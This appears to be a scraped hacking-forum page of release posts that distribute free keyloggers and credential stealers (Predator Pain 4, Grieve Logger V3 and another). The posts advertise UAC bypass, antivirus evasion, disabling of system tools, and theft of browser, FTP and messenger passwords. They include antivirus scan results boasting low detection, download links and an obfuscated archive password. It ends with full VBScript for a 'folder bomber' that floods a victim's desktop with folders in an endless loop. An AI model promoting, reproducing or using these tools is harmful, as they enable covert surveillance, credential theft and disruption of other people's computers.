http://rapidshare.com/files/291217989/CEHv6-Labs-Volume-4.part7.rar


8 comments:

[UD]Predator Pain 4.x.x[Free V.][Binder][Stealers many][Keylogger][Encryption]New D/L

OK guys after taking a look through this section last night looking at all these failed loggers i started shaking my head. You have programmers who code a project then leave the newbies struggling trying to figure out how to use it. Errors here errors there then i had flashbacks of the days when i released Predator Pain 3.2 and you guys loved it worked great for most of you guys and girls but it had limited features :(. Well yesterday i was in the Holiday mood and decided to take 2 hours to recode my first predator 4.0.0 version which was suppose to be private but then it had a bug and i got feed up and recoded the whole shit in codedom. Well i opened up this project last night and fixed that bug took out a few things and added things, then tested got a 100% working logger. This is the only time I'm going to say this i never packed a FREE LOGGER with so many features got it keep that in mind. I'm going to use spam Deal with it do not post on your forums or other forums WITHOUT my permission ask me first you will then use the links i provided. Do not sell this Product its free and it says free all over it.

[Image: Pred4part1.png]

[Image: pred4part2.png]

Features:

[X}Encrypted Email Username and Password(RC4 Encryption)(*Keeps your hacking info Encrypted)

[X}Runs Hidden and undetected

[X}Mutex(Makes sure your server runs only once if slave double clicks)

[X}Windows XP, Windows Vista, Windows Seven(*UAC Bypass/ Working startup)

[X}Clean Keyboard Hooks(But not bettter than Private version but better than all free loggers around.)

[X}Interval Choosing(Choose when keylogs and screenshots come in)

[X}Test Email Sending

[X}Icon Changer (Working on All Operating Systems)

[X}File Pumper (Pump bytes into your server to increase the size, make server larger)

[X}Built In Binder(*Added Protection Stairs Encryption to binded file, doing this and online av sites cannot detected a binded file. so for example on NVT scanner it will always show up as nothing being binded if you decide to bind. This also makes your binded file Scantime FUD(always) but i did not add Runpe to this.)

[X}Some aspects of logger are Multi Threaded(For example the stealers are and Email sending so theres no lag, freeze ups nor delays)

[X}For Windows Vista and Windows Seven(*Added UAC Bypass to kill forever while server is running (disk cleaner, remote desktop, System restore, on screen keyboard, Command prompt.)

[X}Windows XP only(*Disable Taskmanager, Folderoption, Disable RegistryTools, Shutdown, CMD)

[X}Clear Steam Cache

[X}Block A Website

Stealers: Im such a nice guy

[X}Steal IP

[X}Steal Firefox

[X}Steal FileZilla

[X}Steal Clipboard Logger

[X}Steal Screenshot

[X}Steal No-IP DUC

[X}Steal IMVU

[X}Steal DyNDNS

[X}Steal Pidgin

[X}Steal FTPCommander

[X}Steal Paltalk

[X}Steal SmartFTP

[X}Steal CoreFTP

[X}Steal FlashFXP

[X}Steal Sys Info

[X}Steal CD Keys



17 comments:

[UD 6/33] Grieve Logger Public V3 Released! [Many Features][Unique Outputs][Nice GUI]


Grieve Logger V3


The Long Awaited Sequel



Its finally here guys! V3 of my keylogger, have fun!

Screenshots:

Features:
  • UD 6/33
  • Use Any E-Mail Provider For Your KeyLogs
  • Add To Start Up
  • Kill Task Manager
  • Hide File After Execution
  • Block AV Scanning Sites
  • Kill Registry Editor
  • Kill Command Promt
  • Obfuscate Output - No More Getting Your E-Mail Account Lost By Whaling!
  • Anit-Reflector - No More Decompilation Of Your Server
  • Icon Changer
  • CodeDOM Compiled
  • Unique Outputs
  • Mutex
  • Fast Execution
  • Custom Sending Interval

Scans:
Builder:
File Info

Report date: 2011-04-16.
Link to scan: http://myavscan.com/result.php?scan=MTQ4NzM=
File name: Grieve_Logger_Public_V3.exe
File size: 2622464 bytes
MD5 Hash: 0e8df78b96b7129672640e216a44e815
SHA1 Hash: 77edaebb848e2abc861b4cbc4157eb750a0902cc
Detection rate: 0 out of 33
Status: CLEAN

Detections

AVG - Clean.
Acavir - Clean.
Avast 5 -Clean.
Avast -Clean.
Avira -Clean.
BitDefender -Clean.
VirusBuster Internet Security -Clean.
Clam Antivirus -Clean.
COMODO Internet Security -Clean.
DrWeb -Clean.
eTrust-Vet -Clean.
F-PROT Antivirus -Clean.
F-Secure Internet Security -Clean.
G Data -Clean.
IKARUS Security-Clean.
Kaspersky Antivirus -Clean.
McAfee -Clean.
MS Security Essentials -Clean.
ESET NOD32 -Clean.
Norman -Clean.
Norton -Clean.
Panda Security -Clean.
A-Squared Security -Clean.
Quick Heal Antivirus -Clean.
Rising Antivirus -Clean.
Solo Antivirus -Clean.
Sophos -Clean.
Trend Micro Internet Security -Clean.
VBA32 Antivirus -Clean.
Vexira Antivirus -Clean.
Webroot Internet Security -Clean.
Zoner AntiVirus -Clean.
AhnLab V3 Internet Security -Clean.

Scan report generated by
MyAvScan.com

Output Server
File Info

Report date: 2011-04-16.
Link to scan: http://myavscan.com/result.php?scan=MTQ4Njk=
File name: Server_17th_May.exe
File size: 147456 bytes
MD5 Hash: 43845c6a665f5d54932021de9e974ae6
SHA1 Hash: 4865a6734b18d5b64aaf23538d6395ca7b60ae06
Detection rate: 6 out of 33
Status: INFECTED

Detections

AVG - Clean.
Acavir - Clean.
Avast 5 -Clean.
Avast -Clean.
Avira -Clean.
BitDefender -Clean.
VirusBuster Internet Security -Clean.
Clam Antivirus -Clean.
COMODO Internet Security -Clean.
DrWeb -Clean.
eTrust-Vet -Clean.
F-PROT Antivirus -Clean.
F-Secure Internet Security -Gen:Heur.MSIL.Krypt.3.
G Data -Gen:Heur.MSIL.Krypt.3 (Engine-A).
IKARUS Security-Trojan-PWS.Agent.
Kaspersky Antivirus -HEUR:Trojan.Win32.Generic.
McAfee -Clean.
MS Security Essentials -Clean.
ESET NOD32 -rojan.MSIL/Spy.Keylogger.BEMNTrojan.MSIL/Spy.Keylogger.BEEN.
Norman -Clean.
Norton -Clean.
Panda Security -Clean.
A-Squared Security -Trojan-PWS.Agent!IK.
Quick Heal Antivirus -Clean.
Rising Antivirus -Clean.
Solo Antivirus -Clean.
Sophos -Clean.
Trend Micro Internet Security -Clean.
VBA32 Antivirus -Clean.
Vexira Antivirus -Clean.
Webroot Internet Security -Clean.
Zoner AntiVirus -Clean.
AhnLab V3 Internet Security -Clean.

Scan report generated by
MyAvScan.com

Download Link:
http://adf.ly/1FPZt

Password:
Code:
2rxWMk6Xym9EyVrC9kgjLKZKvK1TMkNt2rNEMsMK9lZL1qHCMkrP3DBy=WxWykNYMkVtxXMovlZXtj5l​​9XRDyzBowlvj=WRmwXYp=49s2UpXyW1Mvm9ELQ//

or

Download Here

Encrypted With:
TRIPO-5 -> BASE-64 -> FERON-74 -> ZONG22 -> GILA7 -> ESAB-46

Igonre Any Errors In Decoding

  Subscribers! Can PM Me For The Password

Credits:
  • Classical
  • Aeonhack

Changelog:
- Version 3.0:Version 3.0 Released

13 comments:

ѕмии™ Keylogger V1 [Stealer, Antis, StartUp] New!!! FREE

ѕмии™ Keylogger V1


Hi this is my Keylogger "ѕмии™ Keylogger". It is free and have cool features!
I will be updating it as much as I can. I hope you like it


Screen Shots:
[Image: Show.gif?t=1286725450]
Other Screenshots

[Image: 83126306.png]
[Image: 97580511.png]

Features:
[]Basic GUI
+Looks Good
[]Gmail Support
+Uses Gmail
[]Antis
+]Key Scrambler
+Wireshark
+Anubis
+Maleware Bytes
+Kaspersky
+Ollydbug
+Outpost
+Norman
+BitDefender
+Nod32

[]Stealer
+Firefox
+Chrome
+Internet Explorer
+Opera
+ Instent messengers

[]Start Up
+Add the Keylogger to Startup

Virus Scan
Keylogger
[Image: scanl.png]

Stub
[Image: stubscan.png]

Download

2 comments:

A Speaking Folder Bomber on the Desktop with Vbscript


This Code show you how it is easy to make some jokes with your friends or your victimes using the Vbscript. So I made a Speaking Folder Bomber on the Desktop.
The aim of this Vbscript is to Create Folders with names begin with VIRUS and a random Number in your desktop every 1 second in infinite Loop.And for the victim it become so hard to delete them manually.



I update this script to become more and more funny, so i add this feature and i tested it in windows xp and i don't know if it runs in windows Vista or Seven so please try it and give me your feedback.
The added feature is that the computer can say the name of the empty folder created by this script.

Code:
'----A Speaking Folder Bomber on the Desktop with Vbscript by Hackoo----
Dim fso,sho,basefolder,FolderBomb,bf
Set fso = CreateObject( "Scripting.FileSystemObject" )
Set sho = CreateObject( "Wscript.Shell" )
Set Voix=CreateObject("SAPI.SpVoice")
basefolder=sho.SpecialFolders("desktop")' Get your Desktop Folder
Set bf = fso.GetFolder( basefolder )
do
Randomize
r=Int((99999*Rnd)+1)
FolderBomb="VIRUS_"&r
Voix.speak FolderBomb 'The Computer speak and tell the name of the empty folder created by this script
bf.subFolders.Add(FolderBomb) 'Create Folders with names begin  with VIRUS and a random Number in your desktop
wscript.sleep 1000 'Pause of 1 second and continue the loop
loop

So for whom want to test this script in their computer without any problem i made for that an antidote or a cleaner.vbs
So when you execute it your desktop become Full of empty Folders with name like this VIRUS_2353 VIRUS_9876 etc.......
so to stop this .You must in first step stop and kill the wscript Process in the TaskManager.
The second step is to use My cleaner.vbs that i have made for this purpose because it's very hard to clean those folders manually.
To Stop Them just copy and paste this script below in Notepad and save it as Cleaner.vbs or Anti-FolderBomer.vbs or what you want but don't forget the extention must be .vbs and execute it and it delete all the Folders created by the Folder Bomber script.

Code:
'---------------Cleaner.vbs---------------
'--------------Made by Hackoo-------------
on error resume next
Dim fso, f, f1, fc, ss
Set fso = CreateObject("Scripting.FileSystemObject")
Set sho = CreateObject( "Wscript.Shell" )
basefolder=sho.SpecialFolders("desktop")
Set f = fso.GetFolder( basefolder )
Set fc = f.SubFolders
NomFichierLog="Dossiers_Vides"
temp = sho.ExpandEnvironmentStrings("%temp%")
Set OutPut = fso.CreateTextFile(temp & "\" & NomFichierLog & ".txt",1)
count=0 'initialisation du compteur des Dossiers vides
NBfichier=0 'initialisation du idesvompteur des fichiers
' Tuer le processus wscript
'sho.run "Taskkill /IM wscript.exe /F", 0
'Boucle pour la recherche des Dossiers vides
Msgbox f
For Each f1 in fc
If f1.size = 0 Then
count= count + 1
OutPut.WriteLine f1.Path
f1.delete
End if
Next
'Boucle pour la recherche des fichiers vides
For Each Fichier in f.files
if Fichier.size = 0 then
NBfichier=NBfichier+1
OutPut.WriteLine Fichier.Path
Fichier.delete
end if
next
Msgbox count& " Dossiers Vides ont été supprimés",64,"Dossiers Vides"
Msgbox NBfichier& " Fichiers Vides ont été supprimés",64,"Dossiers Vides"

Download File:
http://adf.ly/1DGXF


2 comments: